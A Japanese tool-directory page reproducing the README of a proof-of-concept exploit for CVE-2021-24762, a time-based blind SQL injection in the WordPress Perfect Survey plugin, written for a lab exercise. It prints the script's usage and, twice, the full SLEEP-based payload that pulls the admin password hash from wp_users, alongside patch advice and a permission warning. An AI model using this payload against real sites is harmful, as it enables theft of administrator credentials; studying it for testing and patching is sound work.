Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Exploit_CVE-2021-24762 — このリポジトリはCVE-2021-24762のエクスプロイトを示しています。これはデフォルト設定で管理者パスワードを取得するBlind SQLiエクスプロイトです。 | Kitploit
ツール/GitHubGitHub/c4cnm/exploit_cve-2021-24762
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubc4cnm/exploit_cve-2021-24762

Exploit_CVE-2021-24762

このリポジトリはCVE-2021-24762のエクスプロイトを示しています。これはデフォルト設定で管理者パスワードを取得するBlind SQLiエクスプロイトです。

リポジトリを見る
110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

exploit_cve-2021-24762

このリポジトリはCVE-2021-24762のエクスプロイトを示しています。これは、デフォルト設定で管理者パスワードを取得するBlind SQLiエクスプロイトです。

WordpressのPerfectSurveyプラグインを使用したラボ作業中に、SQL脆弱性に行き詰まりました。見つかったPoCはすべてsqlmapベースで、ラボでうまく動作しませんでした(追加の質問が多く、例えばアプリケーションが404を返す、タイムアウトが大きく変動するなどの問題がありました)。そこで、ラボを攻略するためにこれを自作しました。

目標

  • このPoCはCVE-2021-24762を悪用します。これはWordpressプラグインPerfect Surveyに関連しています。 エクスプロイトはSLEEPを使用したSQLインジェクションに基づいており、'admin'ユーザーのパスワードハッシュを取得します。このユーザーはWordpress環境でデフォルトです。
  • 動作条件: Perfect Surveyプラグイン バージョン1.5.2未満。

影響と深刻度

  • CVE-2021-24762: [CVSS 9.8 (クリティカル)]
  • 影響: 機密性、完全性、可用性、不正アクセス。

環境

  • ソフトウェア要件: Python3。

使い方

root@kitploit:~
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
  1. Pythonスクリプトは上記のパラメータを受け取ります。パラメータが渡されない場合は、デフォルト値で実行されます。

  2. 理想的には、少なくともURLを指定する必要があります。-uまたは--urlで指定してください。その他のパラメータはおそらくデフォルトで動作します。

  3. デフォルト設定では、adminユーザーのパスワードハッシュを取得します。この設定はペイロード変数のuser_login値に適用されています。 payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

    他のユーザーのハッシュを探す必要がある場合は、"0x61646d696e" (admin) を必要に応じて変更してください。

リスクと制限

  • 制限: 現在の設定では、このPoCはWordPressのデフォルトデータベース構造でのパスワードハッシュのみを取得します。変更された環境に直面した場合は、このペイロードを変更する必要があります: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

緩和策と是正措置(推奨)

  • 緩和策の推奨: プラグインをバージョン1.5.2以上にアップデートしてください。
  • 参考:
    • https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    • https://www.getperfectsurvey.com/

警告と許可

使用制限 — このリポジトリには、倫理的かつ責任ある使用のみを目的とした機密コンテンツが含まれています。 テスト対象のシステムの所有者から書面による許可を得ている必要があることを忘れないでください。この範囲外の使用は許可されておらず、利用者の責任となります(刑務所に行きたいですか?)。

リポジトリ構造

  • exploit_cve-2021-24762 — エクスプロイト。
  • README.ME — このファイル。

変更履歴

2025-10-10 — c4cnm — 作成および初期修正

連絡先

  • 著者: Red Team CAIS:/Matheus Camargo (c4cnm), [email protected].

ライセンス

GNU General Public License v3 (GPL)

ツールをダウンロード